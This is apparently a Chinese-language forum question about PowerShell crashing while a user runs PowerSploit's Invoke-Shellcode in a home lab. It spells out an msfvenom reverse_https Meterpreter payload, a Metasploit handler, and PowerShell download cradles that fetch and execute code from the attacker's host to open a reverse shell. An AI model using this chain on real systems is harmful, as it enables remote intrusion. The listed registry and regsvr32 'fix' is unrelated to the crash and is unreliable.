运行shellcode木马powershell停止工作

问题遇到的现象和发生背景

在PowerSploit脚本实战中,直接执行ShellCode反弹Meterpreter Shell失败

问题相关代码,请勿粘贴截图

目标是:192.168.182.132 kali
靶机是:192.168.182.141 win server 2008 r2

┌──(root💀kali)-[/home/ustinian]
└─# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.182.132 LPORT=5200 -f powershell -o iloveyou
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 473 bytes
Final size of powershell file: 2325 bytes
Saved as: iloveyou

开启http服务

┌──(root💀kali)-[/home/ustinian]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.182.141 - - [22/Nov/2021 07:57:30] "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -
192.168.182.141- - [22/Nov/2021 07:57:47] "GET /iloveyou HTTP/1.1" 200 -

设置监听没有出错,端口是生成iloveyou后门的端口


msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required           Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes            Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.182.132  yes          The local listener hostname
   LPORT     5200                yes              The local listener port
   LURI                                 no                The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

iex(new-object net.webclient).downloadstring("http://192.168.182.132:8000/Invoke-Shellcode.ps1")
iex(new-object net.webclient).downloadstring("http://192.168.182.132:8000/iloveyou")
invoke-shellcode -shellcode ($buf) -Force
运行结果及报错内容

运行:invoke-shellcode -shellcode ($buf) -Force 时powershell停止工作

img

描述:
  Stopped working

问题签名:
  问题事件名称:    APPCRASH
  Application Name:    powershell.exe
  Application Version:    6.1.7600.16385
  Application Timestamp:    4a5bc7f3
  Fault Module Name:    unknown
  Fault Module Version:    0.0.0.0
  Fault Module Timestamp:    00000000
  Exception Code:    c000001d
  Exception Offset:    000000001bc30006
  OS 版本:    6.1.7600.2.0.0.272.7
  区域设置 ID:    2052
我的解答思路和尝试过的方法

修改注册表
1.使用快捷键【win+R】将电脑运行功能打开,随后输入“regedit”并确定;
2.注册表编辑器打开之后,我们将“\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExe”复制到计算机后;
3.查看页面是否存在默认数值以外的数据,有的话删除即可。随后我们使用鼠标右键单击开始菜单,选择“Windows powershell管理员”;
4.在新的页面中输入“for %i in (%windir%\system32*.dll) do regsvr32.exe /s %i”,按下回车后继续输入“for %i in (%windir%\system32*.ocx) do regsvr32.exe /s %i ”,输入完毕重启即可解决c0000005故障。

我想要达到的结果

MSF反弹成功